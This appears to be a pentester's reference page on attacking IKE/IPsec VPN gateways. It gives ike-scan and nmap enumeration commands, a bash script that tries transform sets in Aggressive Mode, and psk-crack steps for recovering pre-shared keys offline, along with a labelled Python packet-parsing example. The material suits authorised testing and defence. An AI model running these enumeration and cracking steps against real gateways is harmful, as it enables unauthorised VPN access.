Notes
| Alternative Ports |
|---|
| 4500 (NAT-T) |
Service Description
ISAKMP (Internet Security Association and Key Management Protocol), commonly seen with IKE (Internet Key Exchange) as part of IPSec VPNs. It negotiates security associations (SAs) and handles authentication/exchange of cryptographic keys.
This is typically the first point of interaction in VPN setups, and is a target for identifying VPN gateways, user identities, and misconfigurations.
Remember
To abuse Aggressive Mode you need both a valid ID and an accepted transform set before the gateway will return the PSK hash.
Tools & Exploits
Enumeration
nmap

```bash
# With nmap scripts
nmap -sU -p500 --script ike-version <target-ip>
```

ike-scan
Performs IKE discovery and fingerprinting of VPN devices. Can also brute-force valid ID payloads (Aggressive Mode).
```bash
# Fingerprinting
ike-scan <target-ip>
# Aggressive Mode
ike-scan --aggressive --id=myid --pskcrack <target-ip>
```

strongSwan
Open-source IPsec implementation. Useful for testing VPN connections or setting up rogue VPN servers.
```bash
# How To Install
apt install strongswan -y
```

ISAKMP Sniffing
wireshark

Find ISAKMP packets to determine the transform:

```
udp.port == 500 && isakmp
# Or
ip.addr == <target-ip> && udp.port == 500
```

- Or, if you're on the same subnet as the VPN:

```bash
tcpdump -ni eth0 udp port 500
```
What to look for:
- Initiator Packet:
  - Expand: ISAKMP > Security Association > Proposals > Proposal > Transforms
  - Review each transform type: Encryption, Hash, Auth Method, DH Group
- Responder Packet:
  - If it contains Notify Message Type: NO_PROPOSAL_CHOSEN, the proposal was rejected
  - If it contains an SA and subsequent ID/HASH payloads, the proposal was accepted
- Exchange Type: look for exchange type = 4 (Aggressive Mode)
- You can also look for the ID Data in the Identification payload, for example:
  ISAKMP > Payload: Identification > ID Type: FQDN > ID Data: vpn.company.com
ike-scan vs Wireshark Transform ID Mapping
| Crypto Component | Wireshark ID | ike-scan ID |
|---|---|---|
| 3DES-CBC | 5 | 3 |
| AES-CBC | 7 | 5 |
| SHA1 | 2 | 2 |
| MD5 | 1 | 1 |
| PSK | 1 | 1 |
| MODP 768 | 1 | 1 |
| MODP 1024 | 2 | 2 |
| MODP 1536 | 5 | 5 |
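The following is an added example, not part of the original notes, that walks an ISAKMP header and payload chain the way the Wireshark checks above describe: it flags exchange type 4 (Aggressive Mode), decodes each proposed transform using the IANA attribute values Wireshark displays (so 3DES-CBC is 5 and AES-CBC is 7 here; translating to ike-scan's numbering is left to the table above), extracts the Identification payload, and reports NO_PROPOSAL_CHOSEN from a responder. Both packets are constructed inline rather than captured; the initiator sample omits the KE and nonce payloads a real Aggressive Mode packet carries, which the parser skips over like any other payload type it does not decode.

```python
"""Parse IKEv1/ISAKMP datagrams and report what the Wireshark checks above
look for. Sample packets are constructed inline (not captured traffic)."""
import struct

ISAKMP_HDR = "!8s8sBBBBII"  # I-SPI, R-SPI, next payload, version, exchange, flags, msg ID, length
EXCHANGE_TYPES = {2: "Identity Protection (Main Mode)", 4: "Aggressive", 5: "Informational"}
# IANA IKEv1 attribute values: these are the numbers Wireshark displays
ENC = {1: "DES-CBC", 5: "3DES-CBC", 7: "AES-CBC"}
HASH = {1: "MD5", 2: "SHA1"}
AUTH = {1: "PSK", 3: "RSA-SIG"}
GROUP = {1: "MODP 768", 2: "MODP 1024", 5: "MODP 1536", 14: "MODP 2048"}
ID_TYPES = {1: "IPV4_ADDR", 2: "FQDN", 3: "USER_FQDN", 11: "KEY_ID"}
PAYLOAD_SA, PAYLOAD_ID, PAYLOAD_NOTIFY = 1, 5, 11
NO_PROPOSAL_CHOSEN = 14


def _payload(next_type, body):
    """Generic payload header: next payload, reserved, total length."""
    return struct.pack("!BBH", next_type, 0, 4 + len(body)) + body


def build_sa_payload(next_type, enc, hsh, auth, group):
    """SA payload with one proposal carrying one transform (TV-form attributes)."""
    attrs = b"".join(struct.pack("!HH", 0x8000 | t, v)
                     for t, v in ((1, enc), (2, hsh), (3, auth), (4, group)))
    transform = _payload(0, struct.pack("!BBH", 1, 1, 0) + attrs)        # transform #1, KEY_IKE
    proposal = _payload(0, struct.pack("!BBBB", 1, 1, 0, 1) + transform)  # #1, PROTO_ISAKMP, no SPI, 1 transform
    return _payload(next_type, struct.pack("!II", 1, 1) + proposal)      # DOI IPsec, SIT_IDENTITY_ONLY


def build_id_payload(next_type, id_type, data):
    return _payload(next_type, struct.pack("!BBH", id_type, 17, 500) + data)  # protocol UDP, port 500


def build_notify_payload(next_type, msg_type):
    return _payload(next_type, struct.pack("!IBBH", 1, 1, 0, msg_type))  # DOI, PROTO_ISAKMP, no SPI


def build_packet(exchange_type, payloads):
    """payloads: list of (payload type, builder(next_type) -> bytes), chained in order."""
    body = b""
    for i, (_, builder) in enumerate(payloads):
        next_type = payloads[i + 1][0] if i + 1 < len(payloads) else 0
        body += builder(next_type)
    first = payloads[0][0] if payloads else 0
    return struct.pack(ISAKMP_HDR, b"\x11" * 8, b"\x00" * 8, first, 0x10,
                       exchange_type, 0, 0, 28 + len(body)) + body


def _attrs(data):
    """Decode transform attributes; TV form carries the value, TLV form a length."""
    out, off = {}, 0
    while off + 4 <= len(data):
        t, v = struct.unpack_from("!HH", data, off)
        if t & 0x8000:
            out[t & 0x7FFF] = v
            off += 4
        else:
            off += 4 + v
    return out


def _parse_sa(body):
    """Walk SA -> proposals -> transforms, returning one dict per transform."""
    found, off, next_p = [], 8, 2  # skip DOI + Situation; 2 = Proposal payload
    while next_p and off + 8 <= len(body):
        next_p, _, plen = struct.unpack_from("!BBH", body, off)
        spi_size = body[off + 6]
        toff, next_t = off + 8 + spi_size, 3  # 3 = Transform payload
        while next_t and toff + 8 <= off + plen:
            next_t, _, tlen = struct.unpack_from("!BBH", body, toff)
            if tlen < 8:
                break
            a = _attrs(body[toff + 8:toff + tlen])
            found.append({"enc": ENC.get(a.get(1), a.get(1)), "hash": HASH.get(a.get(2), a.get(2)),
                          "auth": AUTH.get(a.get(3), a.get(3)), "group": GROUP.get(a.get(4), a.get(4))})
            toff += tlen
        if plen < 8:
            break
        off += plen
    return found


def parse_isakmp(pkt):
    """Return a summary of exchange type, transforms, identities and notifications."""
    _, _, next_type, _, exch, _, _, length = struct.unpack_from(ISAKMP_HDR, pkt, 0)
    if length != len(pkt):
        raise ValueError("ISAKMP length field does not match datagram size")
    summary = {"exchange_type": exch, "exchange": EXCHANGE_TYPES.get(exch, f"unknown({exch})"),
               "aggressive_mode": exch == 4, "transforms": [], "ids": [], "notifies": []}
    off = 28
    while next_type and off + 4 <= len(pkt):
        ptype = next_type
        next_type, _, plen = struct.unpack_from("!BBH", pkt, off)
        if plen < 4 or off + plen > len(pkt):
            raise ValueError("malformed payload length")
        body = pkt[off + 4:off + plen]
        if ptype == PAYLOAD_SA:
            summary["transforms"].extend(_parse_sa(body))
        elif ptype == PAYLOAD_ID:
            id_type, data = body[0], body[4:]
            text = data.decode("ascii", "replace") if id_type in (2, 3) else data.hex()
            summary["ids"].append((ID_TYPES.get(id_type, str(id_type)), text))
        elif ptype == PAYLOAD_NOTIFY:
            summary["notifies"].append(struct.unpack_from("!H", body, 6)[0])
        off += plen
    summary["proposal_rejected"] = NO_PROPOSAL_CHOSEN in summary["notifies"]
    return summary


# Constructed samples: an Aggressive Mode initiator offering 3DES/SHA1/PSK/MODP 1024 with
# an FQDN identity (KE and nonce omitted), and a responder rejecting the proposal.
INITIATOR_AGGRESSIVE = build_packet(4, [
    (PAYLOAD_SA, lambda n: build_sa_payload(n, 5, 2, 1, 2)),
    (PAYLOAD_ID, lambda n: build_id_payload(n, 2, b"vpn.company.com")),
])
RESPONDER_REJECT = build_packet(5, [
    (PAYLOAD_NOTIFY, lambda n: build_notify_payload(n, NO_PROPOSAL_CHOSEN)),
])

if __name__ == "__main__":
    for name, pkt in (("initiator", INITIATOR_AGGRESSIVE), ("responder", RESPONDER_REJECT)):
        print(name, parse_isakmp(pkt))
```

To apply it to real traffic, pass `parse_isakmp` the UDP payload of each port 500 datagram from a capture; a summary with `aggressive_mode` true and `auth` of PSK is exactly the combination the Remember note above warns about.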
- Manually test for an accepted transform proposal:

```bash
ike-scan --aggressive --id=your_id --trans=3,1,1,2 <target-ip> # MD5
ike-scan --aggressive --id=your_id --trans=5,2,1,2 <target-ip> # AES
ike-scan --aggressive --id=your_id --trans=3,2,1,1 <target-ip> # MODP768
ike-scan --aggressive --id=your_id --trans=3,2,1,5 <target-ip> # MODP1536
```

- Script to brute-force transform proposals after the ID is confirmed valid:

```bash
#!/bin/bash
# Tries each transform (enc,hash,auth,group in ike-scan numbering) in Aggressive Mode
TARGET="$1"
ID="$2"
if [[ -z "$TARGET" || -z "$ID" ]]; then
    echo "Usage: $0 <target-ip> <valid-id>"
    exit 1
fi
transforms=(
    "1,2,1,1"
    "1,2,1,2"
    "1,1,1,2"
    "3,2,1,2"
    "5,2,1,1"
    "5,2,1,2"
    "5,1,1,2"
    "5,2,1,5"
)
for trans in "${transforms[@]}"; do
    echo -e "\n[*] Trying transform: $trans"
    ike-scan --aggressive --id="$ID" --trans="$trans" "$TARGET"
done
```

NOTE
You can also try enumerating SNMP (v2 or below) to see if you can obtain relevant data.
PSK Cracking
psk-crack
Tool that recovers the pre-shared key from captured IKE handshakes (typically when aggressive mode is enabled and ID is known or guessed).
```bash
# After capturing the handshake with ike-scan:
psk-crack psk-hash-file.txt
```

- Aggressive Mode exposes hashed PSKs, allowing offline cracking.
- Useful to combine ike-scan with psk-crack to recover weak shared secrets.